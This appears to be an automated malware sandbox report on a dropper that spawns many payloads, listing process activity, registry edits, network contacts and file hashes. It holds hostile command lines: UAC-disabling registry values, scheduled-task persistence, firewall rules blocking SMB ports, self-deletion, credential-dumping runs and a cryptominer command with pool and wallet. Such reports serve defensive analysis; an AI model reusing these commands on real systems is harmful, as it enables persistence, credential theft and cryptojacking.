PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 2972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 1528 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2564 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Roaming\healastounding.exe

"C:\Users\Admin\AppData\Roaming\healastounding.exe"

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\test.exe

"C:\Users\Admin\AppData\Roaming\test.exe"

C:\Users\Admin\AppData\Roaming\22.exe

"C:\Users\Admin\AppData\Roaming\22.exe"

C:\Users\Admin\AppData\Roaming\gay.exe

"C:\Users\Admin\AppData\Roaming\gay.exe"

C:\Users\Admin\AppData\Roaming\___11.19.exe

"C:\Users\Admin\AppData\Roaming\___11.19.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\Opus.exe

"C:\Users\Admin\AppData\Roaming\Opus.exe"

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Roaming\4.exe

"C:\Users\Admin\AppData\Roaming\4.exe"

C:\Users\Admin\AppData\Roaming\a.exe

"C:\Users\Admin\AppData\Roaming\a.exe"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add policy name=Block

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "ISS Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpAA91.tmp"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Users\Admin\AppData\Roaming\mediaget.exe

"C:\Users\Admin\AppData\Roaming\mediaget.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filterlist name=Filter1

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "ISS Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC5B0.tmp"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "0fd7de5367376231a788872005d7ed4f" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1420090574490970998-1514513884419101326-171104240-183127650733380225-1896207397"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\KBDVNTC\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "a" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb\a.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TXPlatforn" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\TXPlatforn.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Documents and Settings\taskhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ckwNq3q2sC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe

C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\259437400.txt",MainThread

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filteraction name=FilteraAtion1 action=block

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

C:\ProgramData\Start Menu\dllhost.exe

"C:\ProgramData\Start Menu\dllhost.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static set policy name=Block assign=y

C:\Windows\Help\Winlogon.exe

C:\Windows\Help\Winlogon.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 216

C:\Windows\Cursors\WUDFhosts.exe

C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 804

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\259457134.bat" "C:\Users\Admin\AppData\Roaming\aaa.exe" "

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

Network

Country Destination Domain Proto
MD 194.180.174.53:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 pretorian.ac.ug udp
MD 194.180.174.53:80 tcp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 prepepe.ac.ug udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:80 api.ipify.org tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
RU 80.87.192.115:80 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
US 8.8.8.8:53 yabynennet.xyz udp
US 104.155.138.21:81 yabynennet.xyz tcp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 whatismyipaddress.com udp
HU 91.219.236.18:80 91.219.236.18 tcp
US 104.19.222.79:80 whatismyipaddress.com tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
CA 172.98.92.42:58491 tcp
US 104.19.222.79:443 whatismyipaddress.com tcp
US 8.8.8.8:53 kazya1.hopto.org udp
MD 194.180.174.41:80 tcp
RU 92.63.107.12:80 tcp
MD 194.180.174.41:80 tcp
US 8.8.8.8:53 22ssh.com udp
HU 91.219.236.148:80 tcp
US 8.8.8.8:53 pool.usa-138.com udp
SG 45.77.45.115:80 pool.usa-138.com tcp
HU 91.219.236.148:80 tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
RU 80.87.192.115:80 tcp
RU 92.63.107.12:80 tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 files.000webhost.com udp
CA 172.98.92.42:58491 tcp
RU 80.87.192.115:80 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
RU 80.87.192.115:80 tcp
CA 172.98.92.42:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
N/A 127.0.0.1:58491 tcp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
RU 80.87.192.115:80 tcp
N/A 127.0.0.1:58491 tcp
CA 172.98.92.42:58491 tcp

Files

memory/1364-0-0x0000000074921000-0x0000000074922000-memory.dmp

memory/1364-1-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1364-2-0x0000000074920000-0x0000000074ECB000-memory.dmp

C:\Users\Admin\AppData\Roaming\healastounding.exe

MD5 6fb798f1090448ce26299c2b35acf876
SHA1 451423d5690cffa02741d5da6e7c45bc08aefb55
SHA256 b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f
SHA512 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3

\Users\Admin\AppData\Roaming\Pluto Panel.exe

MD5 ed666bf7f4a0766fcec0e9c8074b089b
SHA1 1b90f1a4cb6059d573fff115b3598604825d76e6
SHA256 d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264
SHA512 d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

MD5 0fd7de5367376231a788872005d7ed4f
SHA1 658e4d5efb8b14661967be2183cc60e3e561b2b6
SHA256 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd
SHA512 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863

\Users\Admin\AppData\Roaming\Opus.exe

MD5 759185ee3724d7563b709c888c696959
SHA1 7c166cc3cbfef08bb378bcf557b1f45396a22931
SHA256 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641
SHA512 ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c

C:\Users\Admin\AppData\Roaming\aaa.exe

MD5 860aa57fc3578f7037bb27fc79b2a62c
SHA1 a14008fe5e1eb88bf46266de3d5ee5db2e0a722b
SHA256 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29
SHA512 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1

\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

MD5 8f1c8b40c7be588389a8d382040b23bb
SHA1 bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a
SHA256 ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1
SHA512 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f

C:\Windows\SysWOW64\TXPlatforn.exe

MD5 a4329177954d4104005bce3020e5ef59
SHA1 23c29e295e2dbb8454012d619ca3f81e4c16e85a
SHA256 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd
SHA512 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208

C:\Users\Admin\AppData\Roaming\4.exe

MD5 e6dace3f577ac7a6f9747b4a0956c8d7
SHA1 86c71169025b822a8dfba679ea981035ce1abfd1
SHA256 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63
SHA512 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268

\Users\Admin\AppData\Roaming\22.exe

MD5 dbf9daa1707b1037e28a6e0694b33a4b
SHA1 ddc1fcec1c25f2d97c372fffa247969aa6cd35ef
SHA256 a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6
SHA512 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

MD5 870d6e5aef6dea98ced388cce87bfbd4
SHA1 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54
SHA256 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0
SHA512 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566

memory/3048-160-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1904-164-0x0000000000400000-0x00000000007C2000-memory.dmp

\Users\Admin\AppData\Roaming\3.exe

MD5 748a4bea8c0624a4c7a69f67263e0839
SHA1 6955b7d516df38992ac6bff9d0b0f5df150df859
SHA256 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e
SHA512 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd

memory/1536-195-0x0000000000BD0000-0x0000000000C64000-memory.dmp

memory/2076-163-0x0000000000CA0000-0x0000000000CB2000-memory.dmp

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

MD5 b14120b6701d42147208ebf264ad9981
SHA1 f3cff7ac8e6c1671d2c3387648e54f80957196de
SHA256 d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97
SHA512 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b

memory/1028-158-0x0000000000400000-0x0000000000495000-memory.dmp

memory/3048-156-0x0000000000400000-0x0000000000438000-memory.dmp

memory/1796-135-0x0000000000220000-0x0000000000230000-memory.dmp

memory/1796-134-0x0000000000220000-0x0000000000230000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

MD5 78d40b12ffc837843fbf4de2164002f6
SHA1 985bdffa69bb915831cd6b81783aef3ae4418f53
SHA256 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44
SHA512 c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79

memory/1028-148-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2852-140-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2852-138-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1528-124-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1904-121-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/1904-120-0x0000000000400000-0x00000000007C2000-memory.dmp

memory/1528-119-0x00000000058E0000-0x0000000005CA2000-memory.dmp

C:\Users\Admin\AppData\Roaming\a.exe

MD5 52cfd35f337ca837d31df0a95ce2a55e
SHA1 88eb919fa2761f739f02a025e4f9bf1fd340b6ff
SHA256 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448
SHA512 b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73

memory/3032-98-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3032-97-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/3032-95-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/1364-83-0x0000000074920000-0x0000000074ECB000-memory.dmp

C:\Users\Admin\AppData\Roaming\___11.19.exe

MD5 a071727b72a8374ff79a695ecde32594
SHA1 b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc
SHA256 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745
SHA512 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400

memory/2972-40-0x0000000002490000-0x0000000002590000-memory.dmp

memory/2464-63-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2464-61-0x0000000000400000-0x000000000044F000-memory.dmp

memory/2464-60-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2564-211-0x0000000005080000-0x000000000662A000-memory.dmp

memory/700-241-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/700-257-0x0000000010000000-0x00000000101B6000-memory.dmp

C:\Users\Admin\AppData\Roaming\mediaget.exe

MD5 8eedc01c11b251481dec59e5308dccc3
SHA1 24bf069e9f2a1f12aefa391674ed82059386b0aa
SHA256 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d
SHA512 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc

C:\Users\Admin\AppData\Local\Temp\HD_X.dat

MD5 696a7236e14e7407b5023681fba1d690
SHA1 43c550a8ab63b5f5a2a2622e5f614c4aaeeaf78e
SHA256 af034321362311726b4f39f658d691b7cf2ddf6eccd13f771532abde387f720a
SHA512 4582231dde50799d1925ba884e6e9d4bfde0a7ca56ee0f9d7bb0ccea18cbb73bda8bdf4de387537ade3d0be5c496f5748346c91806da72f7bf2e0fd814a6d0a0

memory/2096-237-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-233-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-229-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-226-0x0000000005FC0000-0x0000000006382000-memory.dmp

C:\ProgramData\kaosdma.txt

MD5 2c807857a435aa8554d595bd14ed35d1
SHA1 9003a73beceab3d1b1cd65614347c33117041a95
SHA256 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b
SHA512 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

memory/2096-223-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-220-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2096-218-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/2564-210-0x0000000005080000-0x000000000662A000-memory.dmp

memory/2096-240-0x0000000005FC0000-0x0000000006382000-memory.dmp

memory/1536-288-0x00000000002C0000-0x00000000002CC000-memory.dmp

memory/1536-291-0x00000000002D0000-0x00000000002DC000-memory.dmp

memory/1536-290-0x00000000002F0000-0x00000000002FC000-memory.dmp

memory/1536-289-0x00000000002E0000-0x00000000002EA000-memory.dmp

memory/700-209-0x0000000010000000-0x00000000101B6000-memory.dmp

memory/2096-214-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/2232-53-0x0000000000400000-0x0000000000625000-memory.dmp

C:\Users\Admin\AppData\Roaming\test.exe

MD5 7e50b292982932190179245c60c0b59b
SHA1 25cf641ddcdc818f32837db236a58060426b5571
SHA256 a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8
SHA512 c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885

memory/1528-13-0x0000000074920000-0x0000000074ECB000-memory.dmp

memory/1528-12-0x0000000074920000-0x0000000074ECB000-memory.dmp

